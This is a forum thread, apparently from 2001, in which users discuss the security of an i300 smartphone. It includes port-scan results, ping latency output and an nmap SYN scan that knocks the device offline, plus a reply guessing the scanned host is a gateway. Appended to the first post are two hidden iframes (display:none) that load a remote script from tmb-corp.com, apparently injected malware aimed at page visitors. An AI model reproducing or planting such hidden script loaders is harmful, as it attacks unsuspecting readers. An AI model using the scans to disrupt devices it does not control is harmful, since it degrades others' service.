Poll: how safe do you feel about the security of your i300 ?

+ Reply to Thread
Results 1 to 3 of 3
  1. #1
    Registered User
    Join Date
    12-06-2001
    Posts
    2

    Cool security && bringing your i300 to its knees...

    greetings...

    the lure of having the ability to obtain a wireless connection to
    internet has been the main reason i chose to purchase a 'smart
    phone'. browsing web pages, checking email, and instant mess-
    aging are some of the really useful/useless features of these
    devices.

    i have been working to determine my host masks when on a
    data call. while toying i have experienced the following:

    1) SuperScan have revealed some interesting ports open (not all
    together reliable, but interesting ntl). these are certianly
    dependant on my provider, Spr1nt. (further investigation will
    wait until i am on my nights/weekends time) :P

    + XxX.xXx.XxX.xXx
    |___ 25 [smtp] Simple Mail Transfer
    |___ 80 [http] World Wide Web HTTP
    |___ 81 [hosts2-ns] HOSTS2 Name Server
    |___ 82 [xfer] XFER Utility
    |___ 83 [mit-ml-dev] MIT ML Device
    |___ 110 [pop3] Post Office Protocol - Version 3
    |___ 135 [epmap] DCE endpoint resolution
    |___ 139 [netbios-ssn] NETBIOS Session Service
    |___ 443 [https] https MCom
    |___ 445 [microsoft-ds] Microsoft-DS
    |___ 515 [printer] spooler
    |___ 1025 [blackjack] network blackjack
    |___ 1032 [iad3] BBN IAD
    |___ 1080 [socks] Socks
    |___ 5190 [aol] America-Online
    |___ 8080 [WWW-Proxy] Standard HTTP Proxy

    2) using simple pings i can drasticly slow the connection if not disconnect the device.

    64 bytes from XX.xx.XX.xx: icmp_seq=45 ttl=244 time=5916.6 ms
    64 bytes from XX.xx.XX.xx: icmp_seq=46 ttl=244 time=4920.0 ms
    64 bytes from XX.xx.XX.xx: icmp_seq=47 ttl=244 time=4525.4 ms
    64 bytes from XX.xx.XX.xx: icmp_seq=48 ttl=244 time=4519.4 ms
    64 bytes from XX.xx.XX.xx: icmp_seq=49 ttl=244 time=3522.8 ms
    64 bytes from XX.xx.XX.xx: icmp_seq=50 ttl=244 time=2526.2 ms
    64 bytes from XX.xx.XX.xx: icmp_seq=51 ttl=244 time=5704.5 ms
    64 bytes from XX.xx.XX.xx: icmp_seq=52 ttl=244 time=5634.2 ms
    64 bytes from XX.xx.XX.xx: icmp_seq=53 ttl=244 time=4637.6 ms

    3) nmap -vv -sS XxX.xXx.XxX.xXx
    this is the kicker, everytime i initiate a nmap scan on my device it
    ends up bringing the device to its knees, then abruptly
    disconcecting!! on top of this it seems that the device requires a
    idle time of roughly 3-4 minutes to allow for a reconnect.

    nmap output:

    adjust_timeout: packet supposedly had rtt of 22961439 microseconds. Ignoring time.
    adjust_timeout: packet supposedly had rtt of 22963579 microseconds. Ignoring time.
    adjust_timeout: packet supposedly had rtt of 22965729 microseconds. Ignoring time.
    adjust_timeout: packet supposedly had rtt of 22967935 microseconds. Ignoring time.
    adjust_timeout: packet supposedly had rtt of 22970094 microseconds. Ignoring time.
    adjust_timeout: packet supposedly had rtt of 22972246 microseconds. Ignoring time.

    so what does all this mean? well personally being the paranoid
    individual i am, playing with this stuff is very interesting.

    what if any are implications? thats left open for discussion.
    anyone else want to help me investigate please feel free to mail
    me with your results and or flames.

    hack6500<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048

    Arrow

    yo hack... id like to know more about what these parameters do.. i have 10,000 minutes to play around with!

  3. #3
    Registered User
    Join Date
    11-07-2001
    Posts
    177

    Most likely a gateway device

    Based on the results that SuperScan is giving you, it would seem to me as though you're looking at a Windows box - not your actual phone. Port 445 is "NetBIOS-less file sharing" and is new in Windows 2000.

    Since your scan shows port 80 open on that device, what happens when you try to open a web connection? Even MORE interesting - since port 25 is open, what type of banner do you get if you telnet to port 25 on that IP? My guess is that you're not actually scanning your phone, but some sort of gateway device inbetween your phone and the Internet.

    -Doug

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts